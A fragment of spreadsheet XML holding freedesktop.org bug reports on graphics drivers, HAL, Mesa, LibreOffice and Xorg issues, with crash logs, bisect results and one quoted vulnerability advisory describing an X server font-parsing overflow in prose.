    <t>DRI-88493</t>
  </si>
  <si>
    <t>No hdmi audio an agd5f 3.20-wip since consolidate audio_get_pin() functions</t>
  </si>
  <si>
    <t>R9270X - audio not perfect normally but there is none at all after -
bead330b1af6fce76aedac9f89d20edcaeae27b3 is the first bad commit
commit bead330b1af6fce76aedac9f89d20edcaeae27b3
Author: Slava Grigorev 
Date:   Tue Dec 2 15:22:43 2014 -0500
    radeon/audio: consolidate audio_get_pin() functions
There is also another minor issue on head but I haven't had time to bisect and it doesn't always show.
If I bring TV up after booting with TV off there are a few pix of pink on left of screen - doing anything that resets mode/on/off or if on from boot avoids.
Didn't see it in the bisect - first was bad so I guess it's in the other half.</t>
  </si>
  <si>
    <t>HAL-20703</t>
  </si>
  <si>
    <t>HAL sometimes doesn't emit udi-removed signals</t>
  </si>
  <si>
    <t>hal-0.5.12-24.20090226git.fc11.i586
Sierra 881 mobile broadband card.  When the mobile broadband connection is
active in NetworkManager pulling the card without disconnecting emits removal
signals for some devices but not for other devices:
Obligatory lshal --monitor output:
23:06:37.994: pci_1033_35 added
23:06:38.180: pci_1033_35_0 added
23:06:38.369: usb_device_1d6b_1_0000_03_00_0 added
23:06:38.476: usb_device_1d6b_1_0000_03_00_0_if0 added
23:06:38.614: usb_device_1d6b_1_0000_03_00_1 added
23:06:38.632: usb_device_1d6b_1_0000_03_00_1_if0 added
23:06:42.845: usb_device_1199_6851_noserial added
23:06:43.104: usb_device_1199_6851_noserial_if0 added
23:06:44.038: computer_power_supply_battery_BAT0 property
battery.voltage.current = 12599 (0x3137)
23:06:45.990: usb_device_1199_6851_noserial_if0_serial_usb_0 added
23:06:46.098: usb_device_1199_6851_noserial_if0_serial_usb_2 added
23:06:48.127: usb_device_1199_6851_noserial_if0_serial_usb_3 added
23:06:48.215: usb_device_1199_6851_noserial_if0_serial_usb_1 added
(activate 3G connection)
23:07:14.063: computer_power_supply_battery_BAT0 property
battery.voltage.current = 12604 (0x313c)
23:07:21.562: net_computer added
(pull card while 3G connection is active)
23:07:40.061: usb_device_1199_6851_noserial_if0 removed
23:07:40.100: usb_device_1199_6851_noserial removed
23:07:40.205: usb_device_1d6b_1_0000_03_00_0_if0 removed
23:07:40.264: usb_device_1d6b_1_0000_03_00_0 removed
23:07:40.365: pci_1033_35 removed
23:07:40.446: usb_device_1d6b_1_0000_03_00_1_if0 removed
23:07:40.490: usb_device_1d6b_1_0000_03_00_1 removed
23:07:40.611: pci_1033_35_0 removed
23:07:40.632: net_computer removed
23:07:44.056: computer_power_supply_battery_BAT0 property
battery.voltage.current = 12599 (0x3137)
Notice how no device removal messages are sent for the following four serial
TTYs:
usb_device_1199_6851_noserial_if0_serial_usb_0 added
usb_device_1199_6851_noserial_if0_serial_usb_2 added
usb_device_1199_6851_noserial_if0_serial_usb_3 added
usb_device_1199_6851_noserial_if0_serial_usb_1 added
NetworkManager kind of depends on HAL to send device-removal signals when a
device gets removed and if HAL doesn't do that weird stuff happens like the
3G card still showing up in the applet menu even though it's been pulled out
becuase HAL didn't send the removal signal for the tty and thus NM doesn't
think the device has been removed.
But the ttys actually *are* removed because they aren't in the device list (checked with lshal) after the card has been pulled.  So the removal signal for the tty seems to be getting dropped on the floor.</t>
  </si>
  <si>
    <t>MESA-44007</t>
  </si>
  <si>
    <t>Firefox crashes in WebGL u_double_list.h:69</t>
  </si>
  <si>
    <t>Firefox (e. g. 2011-12-18-03-11-40-mozilla-central) crashes in u_double_list.h:69 if the browser's troubleshooting page is reloaded quickly:
1. Open Help/Troubleshooting Information
2. Press and Hold Ctrl-R
Used Drivers:
X.Org -- Gallium 0.4 on AMD RV730 -- 2.1 Mesa 7.12-devel (git-3788b4b)
Fx Bug: https://bugzilla.mozilla.org/show_bug.cgi?id=706397
Backtrace: https://bug706397.bugzilla.mozilla.org/attachment.cgi?id=577882</t>
  </si>
  <si>
    <t>FONTCONFIG-23294</t>
  </si>
  <si>
    <t>Use multi-byte codepage aware string function on Windows</t>
  </si>
  <si>
    <t>Created attachment 28605
Suggested patch
The East Asian double-byte codepages have characters with backslash as
the second byte so we must use _mbsrchr() instead of strrchr() when
looking at pathnames in the system codepage.</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-11120</t>
  </si>
  <si>
    <t>Please turn off the XCB MoinMoin wiki</t>
  </si>
  <si>
    <t>We have fully transitioned to the new XCB ikiwiki at http://xcb.freedesktop.org  please turn off the MoinMoin wiki by removing the following lines from /etc/apache2/sites-available/xcb.freedesktop.org:
        # MoinMoin wiki configuration
        Alias /moin/ /usr/share/moin/htdocs/
                SetHandler python-program
                PythonPath ['/srv/xcb.freedesktop.org/moin']+sys.path
                PythonHandler MoinMoin.request::RequestModPy.run
Thank you.</t>
  </si>
  <si>
    <t>LIBREOFFICE-51948</t>
  </si>
  <si>
    <t>linking -ldl on BSD in pyuno</t>
  </si>
  <si>
    <t>build fails in tail_build
[ build LNK ] Library/pyuno.so
/usr/local/bin/ld: cannot find -ldl
collect2: error: ld returned 1 exit status
gmake[2]: *** [/usr/home/waitman/libreoffice/libo/workdir/unxfbsd.pro/LinkTarget/Library/pyuno.so] Error 1
--&gt; quick fix is to update Library_pyuno_wrapper.mk 
remove:
ifneq ($(GUI)$(COM)WNTMSC)
ifneq ($(OS)MACOSX)
$(eval $(call gb_Library_add_libspyuno_wrapper\
-ldl \
))
endif
endif
However probably condition should be added if OS = BSD/Unix to skip -ldl
Thank you.</t>
  </si>
  <si>
    <t>waitman</t>
  </si>
  <si>
    <t>DRI-85977</t>
  </si>
  <si>
    <t>[BYT DSI PMIC backlight] Backlight support for Dell Venue 8 Pro</t>
  </si>
  <si>
    <t>Created attachment 109061
Hack to add backlight support for DV8P
Backlight support for Dell Venue 8 Pro (8086:0f31) tablet is currently missing. The attached patch adds support for it in a ugly way and needs to be cleanup by someone more familiar with intel graphic. It is based on a hack made by Jon Pry for his Asus T100.</t>
  </si>
  <si>
    <t>shobhit.kumar</t>
  </si>
  <si>
    <t>jan.brummer</t>
  </si>
  <si>
    <t>DRI-105633</t>
  </si>
  <si>
    <t>[amdgpu][bisected] PRIME stuttering tearing</t>
  </si>
  <si>
    <t>I've bisected this to:
commit 9021d2edd259d992cf8b5b48791ab50829129de7                                                                                                                                                                                                               
Author: Christian KÃ¶nig                                                                                                                                                                                                             
Date:   Mon Feb 19 11:29:35 2018 +0100                                                                                                                                                                                                                        
    drm/amdgpu: mitigate workaround for i915                                                                                                                                                                                                                  
    To be able to use DRI_PRIME with amdgpu and i915 we add all our fences                                                                                                                                                                                    
    only as exclusive ones.                                                                                                                                                                                                                                   
    Disable that behavior when sharing between amdgpu itself cause it                                                                                                                                                                                         
    hinders concurrent execution.                                                                                                                                                                                                                             
    Signed-off-by: Christian KÃ¶nig                                                                                                                                                                                                  
    Reviewed-by: Alex Deucher                                                                                                                                                                                                      
    Signed-off-by: Alex Deucher    
If I revert that and a bit of:
commit 59dd47728625e6f8e77f888d00596c9fb7057540
Author: Christian KÃ¶nig 
Date:   Tue Feb 20 19:51:02 2018 +0100
    drm/amdgpu: further mitigate workaround for i915
    Disable the workaround on imported BOs as well.
    Signed-off-by: Christian KÃ¶nig 
    Reviewed-by: Alex Deucher                                                                                                                                                                                                            
    Signed-off-by: Alex Deucher    
To work around the compilation issue things go back to normal</t>
  </si>
  <si>
    <t>MESA-59946</t>
  </si>
  <si>
    <t>[r600g] WoW crashed with page allocation failure</t>
  </si>
  <si>
    <t>Playing WoW with my HD4890 and Mesa-git (64 bit) but crashed with this error:
[ 1990.042322] WoW-64.exe: page allocation failure: order:4 mode:0xc0d0
[ 1990.047786] Pid: 5244 comm: WoW-64.exe Not tainted 3.7.4 #2
[ 1990.052142] Call Trace:
[ 1990.053462]  [] ? warn_alloc_failed+0x111/0x123
[ 1990.058252]  [] ? __alloc_pages_direct_compact+0x1ba/0x1cc
[ 1990.064024]  [] ? __alloc_pages_nodemask+0x7a0/0x82a
[ 1990.069261]  [] ? __get_free_pages+0xf/0x3d
[ 1990.073742]  [] ? radeon_cs_ioctl+0x137/0x763 [radeon]
[ 1990.079169]  [] ? drm_mm_put_block+0x46/0x52 [drm]
[ 1990.084240]  [] ? drm_ioctl+0x274/0x335 [drm]
[ 1990.088942]  [] ? radeon_cs_finish_pages+0x7d/0x7d [radeon]
[ 1990.094794]  [] ? unmap_region+0xb6/0xc8
[ 1990.098998]  [] ? _raw_write_lock+0xe/0x21
[ 1990.103348]  [] ? vfs_ioctl+0x1e/0x31
[ 1990.107263]  [] ? do_vfs_ioctl+0x3b8/0x3fa
[ 1990.111633]  [] ? sys_futex+0x11f/0x152
[ 1990.115749]  [] ? sys_ioctl+0x4d/0x7b
[ 1990.119689]  [] ? system_call_fastpath+0x16/0x1b
[ 1990.124575] Mem-Info:
[ 1990.125550] DMA per-cpu:
[ 1990.126799] CPU    0: hi:    0 btch:   1 usd:   0
[ 1990.130320] CPU    1: hi:    0 btch:   1 usd:   0
[ 1990.133819] CPU    2: hi:    0 btch:   1 usd:   0
[ 1990.137305] CPU    3: hi:    0 btch:   1 usd:   0
[ 1990.140833] CPU    4: hi:    0 btch:   1 usd:   0
[ 1990.144318] CPU    5: hi:    0 btch:   1 usd:   0
[ 1990.147823] CPU    6: hi:    0 btch:   1 usd:   0
[ 1990.151309] CPU    7: hi:    0 btch:   1 usd:   0
[ 1990.154798] DMA32 per-cpu:
[ 1990.156238] CPU    0: hi:  186 btch:  31 usd:   0
[ 1990.159731] CPU    1: hi:  186 btch:  31 usd:   0
[ 1990.163217] CPU    2: hi:  186 btch:  31 usd:   0
[ 1990.166734] CPU    3: hi:  186 btch:  31 usd:   0
[ 1990.170252] CPU    4: hi:  186 btch:  31 usd:   0
[ 1990.173776] CPU    5: hi:  186 btch:  31 usd:   0
[ 1990.177258] CPU    6: hi:  186 btch:  31 usd: 182
[ 1990.180757] CPU    7: hi:  186 btch:  31 usd:   0
[ 1990.184242] Normal per-cpu:
[ 1990.185762] CPU    0: hi:  186 btch:  31 usd:  13
[ 1990.189253] CPU    1: hi:  186 btch:  31 usd:  90
[ 1990.192755] CPU    2: hi:  186 btch:  31 usd:  19
[ 1990.196266] CPU    3: hi:  186 btch:  31 usd:  64
[ 1990.199776] CPU    4: hi:  186 btch:  31 usd:  52
[ 1990.203284] CPU    5: hi:  186 btch:  31 usd:  48
[ 1990.206790] CPU    6: hi:  186 btch:  31 usd:  50
[ 1990.210278] CPU    7: hi:  186 btch:  31 usd:   0
[ 1990.213791] active_anon:374280 inactive_anon:469650 isolated_anon:192
 active_file:24194 inactive_file:24575 isolated_file:0
 unevictable:0 dirty:0 writeback:149872 unstable:0
 free:23513 slab_reclaimable:10794 slab_unreclaimable:35847
 mapped:7678 shmem:322594 pagetables:8693 bounce:0
 free_cma:0
[ 1990.239233] DMA free:15888kB min:168kB low:208kB high:252kB active_anon:0kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15648kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:0kB slab_unreclaimable:16kB kernel_stack:0kB pagetables:0kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[ 1990.275212] lowmem_reserve[]: 0 3247 6019 6019
[ 1990.278459] DMA32 free:47772kB min:36364kB low:45452kB high:54544kB active_anon:572404kB inactive_anon:1559168kB active_file:80412kB inactive_file:81320kB unevictable:0kB isolated(anon):488kB isolated(file):0kB present:3325056kB mlocked:0kB dirty:0kB writeback:323988kB mapped:2348kB shmem:1233272kB slab_reclaimable:7580kB slab_unreclaimable:74352kB kernel_stack:48kB pagetables:6992kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:460 all_unreclaimable? no
[ 1990.319295] lowmem_reserve[]: 0 0 2772 2772
[ 1990.322263] Normal free:31624kB min:31044kB low:38804kB high:46564kB active_anon:924716kB inactive_anon:318112kB active_file:16364kB inactive_file:16980kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2838528kB mlocked:0kB dirty:0kB writeback:292044kB mapped:28364kB shmem:39808kB slab_reclaimable:35596kB slab_unreclaimable:69020kB kernel_stack:3832kB pagetables:27780kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:1534 all_unreclaimable? no
[ 1990.363297] lowmem_reserve[]: 0 0 0 0
[ 1990.365800] DMA: 0*4kB 0*8kB 1*16kB 0*32kB 2*64kB 1*128kB 1*256kB 0*512kB 1*1024kB 1*2048kB 3*4096kB = 15888kB
[ 1990.374825] DMA32: 47*4kB 33*8kB 26*16kB 10*32kB 9*64kB 139*128kB 3*256kB 2*512kB 14*1024kB 4*2048kB 1*4096kB = 47972kB
[ 1990.384573] Normal: 1652*4kB 2657*8kB 0*16kB 1*32kB 1*64kB 0*128kB 1*256kB 1*512kB 1*1024kB 0*2048kB 0*4096kB = 29752kB
[ 1990.394433] 522006 total pagecache pages
[ 1990.397092] 157583 pages in swap cache
[ 1990.399561] Swap cache stats: add 432720 delete 275137 find 1727/2086
[ 1990.404904] Free swap  = 31842932kB
[ 1990.407093] Total swap = 33551716kB
[ 1990.419215] 1572848 pages RAM
[ 1990.420925] 45968 pages reserved
[ 1990.422848] 357666 pages shared
[ 1990.424717] 1491969 pages non-shared
[ 1990.426989] [drm:radeon_cs_ioctl] *ERROR* Failed to parse relocation -12!
Could there be a memory leak somewhere?</t>
  </si>
  <si>
    <t>TELEPATHY-61254</t>
  </si>
  <si>
    <t>tp_message_to_text() does not flag delivery reports with bodies as Non_Text_Content</t>
  </si>
  <si>
    <t>From bug 43166:
&gt; &gt; Unfortunately it exposes a
&gt; &gt; tp-glib bug/issue: the legacy Received signal gets the text of the error
&gt; &gt; from the server (which seems fine) but loses the Non_Text_Content flag
&gt; &gt; (because there is text content).
&gt; 
&gt; Hmm. I think the solution to this is probably that Message_Type_Delivery_Report
&gt; should trigger Non_Text_Content? In my original draft of DeliveryReports they
&gt; would have had { 'interface': '...DeliveryReports' } in the header which I
&gt; think does trigger Non_Text_Content but that was lost when delivery reports
&gt; became a core part of Messages in a later draft.
&gt; 
&gt; This might be a bit more significant than it looks because on the client side
&gt; telepathy-glib Messages clients use the same code to make tp_message_to_text()
&gt; output Non_Text_Content if necessary.</t>
  </si>
  <si>
    <t>LIBREOFFICE-45607</t>
  </si>
  <si>
    <t>Particular BASIC Macro execution significant slower than with OOo NeoOffice Symphony</t>
  </si>
  <si>
    <t>Curious about the LibreOffice I wanted to run my application which was created in OpenOffice calc. It was a surprise to see a significant difference in execution time between LO and OO. After isolating the problem I could measure the performance in both packages.
Please run the following test macro which fills an area of 200 rows with a formula in the column 1 and a string in the column 2.
Execution time on my computer:
OpenOffice  3.3.0 -  8 seconds
LibreOffice 3.4.5 - 15 seconds
'**************************************************************************
Sub test
 Const END_ROW As Integer = 199
 Dim document   As Object
 Dim dispatcher As Object
 document   = ThisComponent.CurrentController.Frame
 dispatcher = createUnoService(com.sun.star.frame.DispatchHelper)
 Dim oDoc   As Object
 Dim oSheet As Object
 Dim oRange As Object
 Dim oCell  As Object
 oDoc   = ThisComponent
 oSheet = oDoc.getCurrentController.ActiveSheet
 ' Select and clean the test cell range
 oRange = oSheet.getCellRangeByPosition(0 0 1 END_ROW)
 oDoc.CurrentController.select(oRange)
 dispatcher.executeDispatch(document .uno:ClearContents  0 Array())
 Dim fun As String
 fun = =SHOW_NUMBER(ROW() ISBLANK(INDIRECT(B &amp; ROW())))
 Dim start_time As Long
 start_time = GetSystemTicks()
 ' Fill the test cell range:
 ' column 1: formula for displaying the row number
 ' column 2: a constant string
 Dim row As Integer
 For row = 0 To END_ROW
  oRange = oSheet.getCellRangeByPosition(0 row 0 row)
  oDoc.CurrentController.select(oRange)
  oCell = oSheet.getCellByPosition(0 row)
  oCell.setFormula(fun)
  oCell = oSheet.getCellByPosition(1 row)
  oCell.String = abc
 Next row
 oRange = oSheet.getCellRangeByPosition(0 0 0 0)
 oDoc.CurrentController.select(oRange)
 oRange = oDoc.createInstance(com.sun.star.sheet.SheetCellRanges)
 oDoc.CurrentController.select(oRange)
 Print Test executed in  + (GetSystemTicks() - start_time)/1000 +  s
End Sub
'**************************************************************************
Function show_number(ByVal nr As Integer ByVal empty As Boolean) As String
 show_number = 
 If Not empty Then
  show_number = Trim(Str(nr)) + .
 End If
End Function</t>
  </si>
  <si>
    <t>xabc123</t>
  </si>
  <si>
    <t>XORG-25948</t>
  </si>
  <si>
    <t>X don't start first time and dies on logout from kde</t>
  </si>
  <si>
    <t>Created attachment 32522
Xorg.log
Hi every one.
I'm using kernel 2.6.33-rc3 from kernel.org with KMS in Debian sid(unstable) environment I installed nouveau driver as described here: http://ubuntuforums.org/archive/index.php/t-1046504.html
When system is loading X starts good (actually kdm starts good :)) then when I enter password and press logic X dies in kde kwin effects work through XRender.
After restarting kdm from virtual console - X works fine then.
The same happens when I logout from kde.</t>
  </si>
  <si>
    <t>MESA-104899</t>
  </si>
  <si>
    <t>GPU HANG after entering a match in Team Fortress 2. fedora 27</t>
  </si>
  <si>
    <t>Steps to reproduce the issue:
boot PC =&gt; launch Steam =&gt; start Team Fortress 2 =&gt; enter a match =&gt; gpu hangs.
the above steps trigger the issue every time (always)
game is not playable as it freezes the PC till game crashs to desktop after a minute.
the journal that brought me here:
kernel: [drm] GPU HANG: ecode 9:0:0x85dffffb in hl2_linux [3347] reason: Hang on rcs0 action: reset
kernel: [drm] GPU hangs can indicate a bug anywhere in the entire gfx stack including userspace.
kernel: [drm] Please file a _new_ bug report on bugs.freedesktop.org against DRI -&gt; DRM/Intel
kernel: [drm] drm/i915 developers can then reassign to the right component if it's not a kernel issue.
kernel: [drm] The gpu crash dump is required to analyze gpu hangs so please always attach it.
kernel: [drm] GPU crash dump saved to /sys/class/drm/card1/error
i915 platform:
~]$ sudo lshw -c video
  *-display                 
       description: VGA compatible controller
       product: Skylake GT2 [HD Graphics 520]
       vendor: Intel Corporation
       physical id: 2
       bus info: pci@0000:00:02.0
       version: 07
       width: 64 bits
       clock: 33MHz
       capabilities: pciexpress msi pm vga_controller bus_master cap_list rom
       configuration: driver=i915 latency=0
       resources: irq:130 memory:e1000000-e1ffffff memory:c0000000-cfffffff ioport:f000(size=64) memory:c0000-dffff
  *-display
       description: Display controller
       product: Topaz XT [Radeon R7 M260/M265 / M340/M360 / M440/M445]
       vendor: Advanced Micro Devices Inc. [AMD/ATI]
       physical id: 0
       bus info: pci@0000:01:00.0
       version: 81
       width: 64 bits
       clock: 33MHz
       capabilities: pm pciexpress msi bus_master cap_list rom
       configuration: driver=amdgpu latency=0
       resources: irq:129 memory:d0000000-dfffffff memory:e0000000-e01fffff ioport:e000(size=256) memory:e0200000-e023ffff memory:e0240000-e025ffff
~]$ modinfo i915 #excluding aliases and signature from the output
filename:       /lib/modules/4.14.14-300.fc27.x86_64/kernel/drivers/gpu/drm/i915/i915.ko.xz
license:        GPL and additional rights
description:    Intel Graphics
author:         Intel Corporation
author:         Tungsten Graphics Inc.
firmware:       i915/bxt_dmc_ver1_07.bin
firmware:       i915/skl_dmc_ver1_26.bin
firmware:       i915/kbl_dmc_ver1_01.bin
firmware:       i915/kbl_guc_ver9_14.bin
firmware:       i915/bxt_guc_ver8_7.bin
firmware:       i915/skl_guc_ver6_1.bin
firmware:       i915/kbl_huc_ver02_00_1810.bin
firmware:       i915/bxt_huc_ver01_07_1398.bin
firmware:       i915/skl_huc_ver01_07_1398.bin
depends:        drm_kms_helperdrmvideoi2c-algo-bit
intree:         Y
name:           i915
vermagic:       4.14.14-300.fc27.x86_64 SMP mod_unload 
sig_id:         PKCS#7
signer:         
sig_key:        
sig_hashalgo:   md4
parm:           modeset:Use kernel modesetting [KMS] (0=disable 1=on -1=force vga console preference [default]) (int)
parm:           panel_ignore_lid:Override lid status (0=autodetect 1=autodetect disabled [default] -1=force lid closed -2=force lid open) (int)
parm:           semaphores:Use semaphores for inter-ring sync (default: -1 (use per-chip defaults)) (int)
parm:           enable_rc6:Enable power-saving render C-state 6. Different stages can be selected via bitmask values (0 = disable 1 = enable rc6 2 = enable deep rc6 4 = enable deepest rc6). For example 3 would enable rc6 and deep rc6 and 7 would enable everything. default: -1 (use per-chip default) (int)
parm:           enable_dc:Enable power-saving display C-states. (-1=auto [default] 0=disable 1=up to DC5 2=up to DC6) (int)
parm:           enable_fbc:Enable frame buffer compression for power savings (default: -1 (use per-chip default)) (int)
parm:           lvds_channel_mode:Specify LVDS channel mode (0=probe BIOS [default] 1=single-channel 2=dual-channel) (int)
parm:           lvds_use_ssc:Use Spread Spectrum Clock with panels [LVDS/eDP] (default: auto from VBT) (int)
parm:           vbt_sdvo_panel_type:Override/Ignore selection of SDVO panel mode in the VBT (-2=ignore -1=auto [default] index in VBT BIOS table) (int)
parm:           reset:Attempt GPU resets (0=disabled 1=full gpu reset 2=engine reset [default]) (int)
parm:           vbt_firmware:Load VBT from specified file under /lib/firmware (charp)
parm:           error_capture:Record the GPU state following a hang. This information in /sys/class/drm/card/error is vital for triaging and debugging hangs. (bool)
parm:           enable_hangcheck:Periodically check GPU activity for detecting hangs. WARNING: Disabling this can cause system wide hangs. (default: true) (bool)
parm:           enable_ppgtt:Override PPGTT usage. (-1=auto [default] 0=disabled 1=aliasing 2=full 3=full with extended address space) (int)
parm:           enable_execlists:Override execlists usage. (-1=auto [default] 0=disabled 1=enabled) (int)
parm:           enable_psr:Enable PSR (0=disabled 1=enabled - link mode chosen per-platform 2=force link-standby mode 3=force link-off mode) Default: -1 (use per-chip default) (int)
parm:           alpha_support:Enable alpha quality driver support for latest hardware. See also CONFIG_DRM_I915_ALPHA_SUPPORT. (bool)
parm:           disable_power_well:Disable display power wells when possible (-1=auto [default] 0=power wells always on 1=power wells disabled when possible) (int)
parm:           enable_ips:Enable IPS (default: true) (int)
parm:           fastboot:Try to skip unnecessary mode sets at boot time (default: false) (bool)
parm:           prefault_disable:Disable page prefaulting for pread/pwrite/reloc (default:false). For developers only. (bool)
parm:           load_detect_test:Force-enable the VGA load detect code for testing (default:false). For developers only. (bool)
parm:           force_reset_modeset_test:Force a modeset during gpu reset for testing (default:false). For developers only. (bool)
parm:           invert_brightness:Invert backlight brightness (-1 force normal 0 machine defaults 1 force inversion) please report PCI device ID subsystem vendor and subsystem device ID to dri-devel@lists.freedesktop.org if your machine needs it. It will then be included in an upcoming module version. (int)
parm:           disable_display:Disable display (default: false) (bool)
parm:           enable_cmd_parser:Enable command parsing (true=enabled [default] false=disabled) (bool)
parm:           use_mmio_flip:use MMIO flips (-1=never 0=driver discretion [default] 1=always) (int)
parm:           mmio_debug:Enable the MMIO debug code for the first N failures (default: off). This may negatively affect performance. (int)
parm:           verbose_state_checks:Enable verbose logs (ie. WARN_ON()) in case of unexpected hw state conditions. (bool)
parm:           nuclear_pageflip:Force enable atomic functionality on platforms that don't have full support yet. (bool)
parm:           edp_vswing:Ignore/Override vswing pre-emph table selection from VBT (0=use value from vbt [default] 1=low power swing(200mV)2=default swing(400mV)) (int)
parm:           enable_guc_loading:Enable GuC firmware loading (-1=auto 0=never [default] 1=if available 2=required) (int)
parm:           enable_guc_submission:Enable GuC submission (-1=auto 0=never [default] 1=if available 2=required) (int)
parm:           guc_log_level:GuC firmware logging level (-1:disabled (default) 0-3:enabled) (int)
parm:           guc_firmware_path:GuC firmware path to use instead of the default one (charp)
parm:           huc_firmware_path:HuC firmware path to use instead of the default one (charp)
parm:           enable_dp_mst:Enable multi-stream transport (MST) for new DisplayPort sinks. (default: true) (bool)
parm:           inject_load_failure:Force an error after a number of failure check points (0:disabled (default) N:force failure at the Nth failure check point) (uint)
parm:           enable_dpcd_backlight:Enable support for DPCD backlight control (default:false) (bool)
parm:           enable_gvt:Enable support for Intel GVT-g graphics virtualization host support(default:false) (bool)
system architecture:
~]$ uname -m
x86_64
kernel version:
~]$ uname -r
4.14.14-300.fc27.x86_64
Linux distribution:
~]$ cat /etc/fedora-release 
Fedora release 27 (Twenty Seven)
Machine or mother board model:
~]$ dmidecode -t 2
# dmidecode 3.1
Getting SMBIOS data from sysfs.
SMBIOS 2.8 present.
Handle 0x0002 DMI type 2 15 bytes
Base Board Information
	Manufacturer: Dell Inc.
	Product Name: 0DVKGM
	Version: A00
	Serial Number: /F89MFC2/CN129636620011/
	Asset Tag: Not Specified
	Features:
		Board is a hosting board
		Board is replaceable
	Location In Chassis: Not Specified
	Chassis Handle: 0x0003
	Type: Motherboard
	Contained Object Handles: 0
Display connector:
I have three monitors each connected to my docking station via a different connector: VGA DVI DP.
But the also gpu hang happens if I only use the build in display alone without the docking statuion.
A full dmesg with debug information:
attached.
(I dont think it has the debug information you are looking for...
I was not sure how to produce it what's the kernel command line?..)
GPU crash dump:
attached.
(sorry for not bz2'ing the file...)</t>
  </si>
  <si>
    <t>avinoash</t>
  </si>
  <si>
    <t>XORG-9325</t>
  </si>
  <si>
    <t>screen remains black w. xf86-video-intel-modesetting branch driver on 965G chipset</t>
  </si>
  <si>
    <t>I'm using a git-checked out Xorg tree (2006-12-08 15.42 CET).
On our boxen w. ATI RV370 5B60 [Radeon X300 (PCIE)] everything is fine.
On those with Intel 82G965 graphics controller the server is unable
to start up complaining
############ master #################
(II) I810(0): BIOS call 0x5f05 not supported setting refresh with VBE 3 method.
(EE) I810(0): Set VBE Mode failed!
#####################################
(Motherboard ASUS P5B-vm chipset 965G)
Last commit in my git log for the modesetting-checkout is
commit fde52de870c84821ab457e17634c334a10cf71ab
modesetting branch starts up the server but screen remains dark except for
monitor message
##############################
Freq ungÃ¼ltig (Freq invalid)
HF: 22.76kHz
VF: 24.24Hz
##############################
After terminating the xserver the screen remains unusable(dark) instead of
switching back to console.</t>
  </si>
  <si>
    <t>DRI-84361</t>
  </si>
  <si>
    <t>[BYT] igt/kms_plane some subcases fail sporadically</t>
  </si>
  <si>
    <t>Created attachment 106905
dmesg
==System Environment==
--------------------------
Regression: Yes.
Good commit on drm-next: edbaae5a5cab89de0e64b8c03ebd9a8d5d266550
Non-working platforms: BSW
==kernel==
--------------------------
origin/drm-intel-nightly: 7101d84020f63f1da7e0c5d021cdd6be4d515de5(fails)
    drm-intel-nightly: 2014y-09m-25d-15h-14m-02s UTC integration manifest
origin/drm-intel-next-queued: 7ca5a41f4da201371e131fc0641033652f76bf30(works)
    drm/i915: Avoid re-configure panel on every PSR re-enable.
origin/drm-intel-fixes: c84db77010877da6c5da119868ed54c43d59e726(timeouts)
    drm/i915/hdmi: fix hdmi audio state readout
origin/drm-fixes: 67f33f30fc3cb7896cbdbd25c70395d38bfa9520(timeouts)
    Merge branch 'drm-fixes-3.17' of git://people.freedesktop.org/~agd5f/linux into drm-fixes
origin/drm-next: d743ecf360637d489a3ba81a268f574359149601(fails)
    drm/doc: Fixup drm_irq kerneldoc includes.
==Bug detailed description==
-----------------------------
igt/kms_plane some subcases fail
Case list:
igt/kms_plane/plane-panning-bottom-right-pipe-A-plane-1
igt/kms_plane/plane-panning-bottom-right-pipe-A-plane-3
igt/kms_plane/plane-panning-bottom-right-pipe-B-plane-1
Output:
[root@x-bsw01 tests]# ./kms_plane --run-subtest plane-panning-bottom-right-pipe-A-plane-1
IGT-Version: 1.8-g4b81e9c (x86_64) (Linux: 3.17.0-rc6_drm-intel-nightly_7101d8_20140926+ x86_64)
Testing connector eDP-1 using pipe A plane 1
Test assertion failure function test_plane_panning_with_output file kms_plane.c:317:
Failed assertion: igt_crc_equal(&amp;test.blue_crc &amp;crc)
Subtest plane-panning-bottom-right-pipe-A-plane-1: FAIL (5.956s)
==Reproduce steps==
---------------------------- 
1. ./kms_plane --run-subtest plane-panning-bottom-right-pipe-A-plane-1</t>
  </si>
  <si>
    <t>XORG-8001</t>
  </si>
  <si>
    <t>cidafm() integer overflows</t>
  </si>
  <si>
    <t>i'm so very happy.  no embargo date as yet.  quoting idefense:
Local exploitation of an integer overflow vulnerability in the 'CIDAFM()'
function in the X.Org and XFree86 X server could allow an attacker to
+execute arbitrary code with privileges of the X server typically root.
The vulnerability specifically exists in the 'CIDADM()' function of the code
responsible for handling AFM (Adobe Font Metrics) files. The number of character
metrics is obtained from the StartCharMetrics line of an AFM file and that
value is then multiplied by the size of a single character metric record in
order to calculate the space required to store the metrics. If the result of the
multiplication is larger than the largest value that can be held in an integer
the amount actually allocated will be much smaller. Following this the function
attempts to read as many metric records as were specified on the line into that
memory. As the contents of the file can be specified by a local user and as the
function will stop reading if an error is detected in the input a controlled
heap overflow may occur which may allow the execution of arbitrary code.</t>
  </si>
  <si>
    <t>LIBREOFFICE-34484</t>
  </si>
  <si>
    <t>Formatting: Number format reverts to date on column width change</t>
  </si>
  <si>
    <t>* .xls spreadsheet
All cells in a column are formatted as Number-General and contain a formula that simply subtracts one date from another to get elapsed days.  When the result exceeds the width of the column and Format-Column-OptimalWidth is performed the display format of *all* cells in the column is changed to the default date format however the actual format remains Number-General as shown by Format-Cell and as demonstrated when the column width is narrowed by dragging and the correct Number-General format is automatically restored.</t>
  </si>
  <si>
    <t>rbpguard-bugzilla</t>
  </si>
  <si>
    <t>MESA-73418</t>
  </si>
  <si>
    <t>OpenCL hangs graphics on CAYMAN</t>
  </si>
  <si>
    <t>Created attachment 91722
dmesg snippet from mesa 10.0.1
When I try to run some OpenCL code from within X the screen freezes goes black goes on again while still frozen ... this repeats a few times till it won't come back again and all I have left is my monitor in standby and my keyboard not reacting to any input.
When I try to run some OpenCL code from a console (Cntrl + Alt + F1) and go back to X while the OpenCL code is still running it's the same as above.
When I try to run some OpenCL code from a console and go back to X after the OpenCL code is finished I have a black monitor with my mouse cursor (I'm even able to move it) for a few seconds then my desktop is back. While it produces the black screen (with mouse cursor) there's also GPU hang logged to dmesg.
